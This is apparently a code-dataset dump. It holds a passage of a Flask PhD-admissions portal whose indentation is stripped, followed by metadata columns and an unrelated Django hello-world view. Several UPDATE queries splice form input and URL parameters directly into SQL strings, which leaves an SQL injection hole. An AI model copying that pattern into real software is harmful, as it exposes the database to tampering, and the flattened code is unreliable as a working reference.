c.execute('''update phd set Submission2 = "Pending" WHERE Application = "'''+application+'''";''')
conn.commit()
c.execute('''update phd set Validation = "Rejected" WHERE Application = "'''+application+'''";''')
conn.commit()
flash('TA notified successfully', 'info')
break
too(test)
return redirect(url_for('dashboard'))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/change_phd1/<application>', methods=['GET', 'POST'])
@login_required
def change_phd1(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0]==application:
if current_user.is_admin==True or current_user.is_manager==True:
c.execute('''update phd set Tutor1 = "'''+request.form['tutor1']+'''" WHERE Application = "'''+application+'''";''')
conn.commit()
flash('Tutor changed successfully', 'success')
break
else:
report=str(current_user.username)+' tried to reasign Tutor = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
break
too(test)
return redirect(url_for('phds.phd'))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
@phds.route('/change_phd2/<application>', methods=['GET', 'POST'])
@login_required
def change_phd2(application):
if current_user.is_active == True:
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
def too(test):
for p in test:
if p[0]==application:
if current_user.is_admin==True or current_user.is_manager==True:
c.execute('''update phd set Tutor2 = "'''+request.form['tutor2']+'''" WHERE Application = "'''+application+'''";''')
conn.commit()
flash('Tutor changed successfully', 'success')
break
else:
report=str(current_user.username)+' tried to reasign Tutor = '+str(application)
fillReport(report,current_user.username,datetime.now())
flash('This incident will be reported ','danger')
break
too(test)
return redirect(url_for('phds.phd'))
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
def fillReport(msg,usr,dt):
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
c.execute("INSERT INTO violations (Report,User,Date) VALUES (?,?,?) ",(msg,usr,dt))
conn.commit()
conn.close()
return
def filltime1(application):
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
for p in test:
if p[0]==application:
t1=p[10]
t2=p[11]
t3=datetime.strptime(t1,'%Y-%m-%d %H:%M:%S.%f')
t4=datetime.strptime(t2,'%Y-%m-%d %H:%M:%S.%f')
diff=t4-t3
c.execute("update phd set tt1 = ? WHERE Application = ?",(diff.seconds,application))
conn.commit()
def filltime2(application):
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
test=c.execute('''SELECT * FROM phd''').fetchall()
test=[tup[::-1] for tup in test]
test = [list(ele) for ele in test]
for p in test:
if p[0]==application:
t1=p[12]
t2=p[13]
t3=datetime.strptime(t1,'%Y-%m-%d %H:%M:%S.%f')
t4=datetime.strptime(t2,'%Y-%m-%d %H:%M:%S.%f')
diff=t4-t3
c.execute("update phd set tt2 = ? WHERE Application = ?",(diff.seconds,application))
conn.commit()
def phdData():
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
c.execute('''
CREATE TABLE phd (
"Application Ref. No." INTEGER
);''')
c.execute('''ALTER TABLE phd ADD Comment2 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission2 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Reject_Reason TEXT''')
c.execute('''ALTER TABLE phd ADD Validation TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Comment1 TEXT''')
c.execute('''ALTER TABLE phd ADD Submission1 TEXT DEFAULT "Pending" ''')
c.execute('''ALTER TABLE phd ADD Tutor1 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD Tutor2 TEXT DEFAULT "Not Assigned" ''')
c.execute('''ALTER TABLE phd ADD alloc_status TEXT DEFAULT "0" ''')
c.execute('''ALTER TABLE phd ADD Application TEXT''')
c.execute('''update phd set Application = "Application Ref. No."; ''')
conn.commit()
conn.close()
return
@phds.route("/phd_submission")
@login_required
def phd_submission():
if current_user.is_active == True:
if current_user.is_admin == True or current_user.is_manager == True:
user=User.query.all()
post=Post.query.all()
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
phd_obj=c.execute('''SELECT * FROM phd''').fetchall()
phd_obj=[tup[::-1] for tup in phd_obj]
conn.close()
return render_template('phd_submissions.html', title='Submissions',
image_file=image_file,phd=phd_obj,
user=user,post=post)
else:
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
| 46.771176
| 183
| 0.48835
| 3,979
| 36,996
| 4.444081
| 0.071375
| 0.043432
| 0.031669
| 0.038455
| 0.835661
| 0.816377
| 0.770684
| 0.729967
| 0.701238
| 0.671153
| 0
| 0.015078
| 0.374338
| 36,996
| 790
| 184
| 46.83038
| 0.748866
| 0.015894
| 0
| 0.735007
| 0
| 0.001395
| 0.227148
| 0.013357
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04463
| false
| 0
| 0.013947
| 0
| 0.121339
| 0.002789
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ee354984037dfceff20591c21468f15318e2ab8
| 111
|
py
|
Python
|
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
def hello_world(request):
return HttpResponse('<h1>Hello World!</h1>')
| 27.75
| 47
| 0.765766
| 15
| 111
| 5.6
| 0.733333
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.108108
| 111
| 4
| 47
| 27.75
| 0.828283
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.